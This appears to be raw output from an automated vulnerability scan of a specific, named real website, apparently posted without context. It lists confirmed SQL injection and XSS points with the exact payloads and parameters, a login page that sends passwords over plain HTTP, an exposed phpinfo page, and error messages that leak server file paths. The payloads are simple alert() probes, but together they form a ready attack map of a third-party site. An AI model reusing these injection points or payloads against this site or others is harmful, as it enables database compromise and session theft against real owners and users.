- [High Possibility] SQL Injection
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL: http://www.ifpicr.cz/?rubrika=%27
- http://www.ifpicr.cz/?rubrika=%27&page=homepage
- http://www.ifpicr.cz/index.php?rubrika=%27&page=homepage
- http://www.ifpicr.cz/index.php?rubrika=%27
- |||
- Cross-site Scripting - XSS
- Cross Site Scripting was found at: "http://www.ifpicr.cz/index.php", using HTTP method POST.
- The sent post-data was: "query=<SCrIPT>alert("Je tu XSS :)")</SCrIPT>&page=search".
- The modified parameter was "query".
- This vulnerability affects ALL browsers.
- This vulnerability was found in the request with id 274.
- Cross Site Scripting was found at: "http://www.ifpicr.cz/index.php", using HTTP method POST.
- The sent post-data was: "query=Hello+World&page=<SCrIPT>alert("mQsW")</SCrIPT>".
- The modified parameter was "page".
- This vulnerability affects ALL browsers.
- This vulnerability was found in the request with id 294.
- The web server at "http://www.ifpicr.cz/" is vulnerable to Cross Site Tracing.
- This vulnerability was found in the request with id 314.
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Vulnerable URL: http://www.ifpicr.cz/index.php
- Parameter Name: page
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000086)</script>
- Vulnerable URL: http://www.ifpicr.cz/index.php
- Parameter Name: page
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00013E)</script>
- Vulnerable URL: http://www.ifpicr.cz/index.php
- Parameter Name: query
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00036C)</script>
- Vulnerable URL: http://www.ifpicr.cz/index.php
- Parameter Name: query
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000423)</script>
- |||
- Password Transmitted Over HTTP
- Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
- Vulnerable URL: http://www.ifpicr.cz/hitparadask/login.php
- |||
- phpinfo() Information Disclosure
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- Vulnerable URL: http://www.ifpicr.cz/phpinfo.php
- |||
- Programming Error Message
- Vulnerability Classifications: PCI 6.5.6 OWASP A6 CAPEC-118 CWE-200 209
- Vulnerable URL: http://www.ifpicr.cz/?rubrika=%27
- Identified Error Message: <b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/data2/ifpicr/html/inc/fce.php</b> on line <b>157</b>
- <b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/data2/ifpicr/html/inc/fce.php</b> on line <b>189</b>
- <b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/data2/ifpicr/html/pages/clanky.php</b> on line <b>7</b>
- Parameter Name: rubrika
- Parameter Type: Querystring
- Attack Pattern: %27
- -----------